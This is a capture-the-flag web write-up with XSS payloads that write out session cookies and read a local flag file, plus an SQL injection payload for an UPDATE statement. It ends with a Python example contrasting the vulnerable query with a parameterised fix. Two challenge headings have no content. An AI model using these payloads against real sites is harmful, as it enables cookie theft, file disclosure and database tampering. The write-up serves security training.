CTF-web-writeup
babyxss
Payloads that trigger JavaScript execution:
<img src=1 document.write(document.cookie)>
<input "document.write(document.cookie)" autofocus>
babyxss2
<img src=1 "var a=new XMLHttpRequest();a.open('GET','file:///var/www/html/flag.php',false);a.send(null);document.write('<textarea rows=10 cols=70>' + a.responseText+'</textarea>');">
put
calculate
Sqli_update
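After getting the challenge, I first scanned the site to see which pages existed, found the website's source code, and audited it.
In update.php, the condition variable of the SQL UPDATE statement is not protected by single quotes, so the page is vulnerable to SQL injection.
I registered an account, submitted the update form, captured the request, and constructed an insert statement, but the page reported that the update failed, so I started debugging locally.
Reference links: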
https://blog.****.net/priestmoon/article/details/8016121
https://blog.****.net/cao478208248/article/details/28122113
Final payload:
select description from (select * from users where username=0x61646d696e)as a
Inspecting the page elements then reveals the flag.
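The flaw found in update.php (an UPDATE whose condition value is concatenated without quotes) is shown below next to a hardened form. This is an added example, not the challenge's source code: it uses Python with an in-memory SQLite database as a stand-in, and the `id` column, the function names and the sample rows are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; the id column and the rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, description TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin notes"), (2, "alice", "hello"), (3, "bob", "hi")])
    return db

def escape_quotes(value):
    # Stand-in for quote escaping; it only protects values inside a quoted literal.
    return value.replace("'", "''")

def update_vulnerable(db, user_id, description):
    # description is quoted and escaped, but the condition value is appended
    # bare, so whatever it contains is parsed as SQL syntax.
    sql = ("UPDATE users SET description = '" + escape_quotes(description) +
           "' WHERE id = " + escape_quotes(user_id))
    return db.execute(sql).rowcount

def update_hardened(db, user_id, description):
    # Enforce the expected type, then bind every value as a parameter.
    if not re.fullmatch(r"[0-9]+", user_id):
        raise ValueError("id must be a decimal integer")
    cur = db.execute("UPDATE users SET description = ? WHERE id = ?",
                     (description, int(user_id)))
    return cur.rowcount

def demo():
    crafted = "2 OR 1=1"  # constructed input containing no quote characters
    rows_vulnerable = update_vulnerable(make_db(), crafted, "x")
    db = make_db()
    try:
        rows_rejected = update_hardened(db, crafted, "x")
    except ValueError:
        rows_rejected = 0
    rows_normal = update_hardened(db, "2", "x")
    untouched = db.execute("SELECT description FROM users WHERE id = 1").fetchone()[0]
    return rows_vulnerable, rows_rejected, rows_normal, untouched

if __name__ == "__main__":
    print(demo())
```

Quote escaping does nothing for a value in an unquoted position; only type validation or parameter binding closes the hole.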